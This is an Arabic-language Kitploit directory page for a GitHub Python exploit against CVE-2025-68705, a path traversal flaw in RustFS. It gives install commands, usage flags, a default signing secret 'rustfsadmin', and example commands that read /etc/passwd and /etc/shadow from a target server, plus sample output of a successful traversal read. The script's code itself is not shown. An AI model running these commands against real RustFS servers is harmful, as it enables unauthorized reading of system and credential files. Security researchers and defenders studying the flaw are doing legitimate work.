Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68705 — نص استغلال بلغة Python لثغرة CVE-2025-68705، وهي ثغرة اجتياز المسار في RustFS، مما يتيح قراءة الملفات بشكل تعسفي والتحقق من الثغرة على الخوادم المستهدفة. | Kitploit
أدوات/GitHubGitHub/imjdl/cve-2025-68705
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubimjdl/cve-2025-68705

CVE-2025-68705

نص استغلال بلغة Python لثغرة CVE-2025-68705، وهي ثغرة اجتياز المسار في RustFS، مما يتيح قراءة الملفات بشكل تعسفي والتحقق من الثغرة على الخوادم المستهدفة.

عرض المستودع
11منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-68705 - استغلال ثغرة اجتياز المسار في RustFS

الوصف

يستغل هذا السكربت ثغرة اجتياز المسار (CVE-2025-68705) في RustFS والتي تسمح بقراءة ملفات عشوائية على الخادم.

المتطلبات

  • Python 3.6+
  • انظر requirements.txt للتبعيات

التثبيت

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

الوسائط المطلوبة

الوسيطالوصف
-H, --hostعنوان IP أو اسم المضيف الهدف
-p, --portرقم منفذ الهدف
-f, --fileمسار الملف للقراءة (اختياري مع --check-only)

الوسائط الاختيارية

الوسيطالوصفالافتراضي
-s, --secretمفتاح سري للتوقيعrustfsadmin
-o, --offsetإزاحة قراءة الملف0
-l, --lengthعدد البايتات للقراءة4096
--check-onlyالتحقق فقط إذا كان الهدف عرضة للثغرة-

أمثلة

قراءة ملف /etc/passwd

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

قراءة ملف /etc/shadow بإزاحة وطول مخصصين

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

استخدام مفتاح سري مخصص

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

التحقق فقط إذا كان الهدف عرضة للثغرة

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 --check-only

قراءة نطاق محدد من الملف

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

مثال على الإخراج

root@kitploit:~
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

المراجع

  • استشارة أمان RustFS
  • CVE-2025-68705
تنزيل الأداة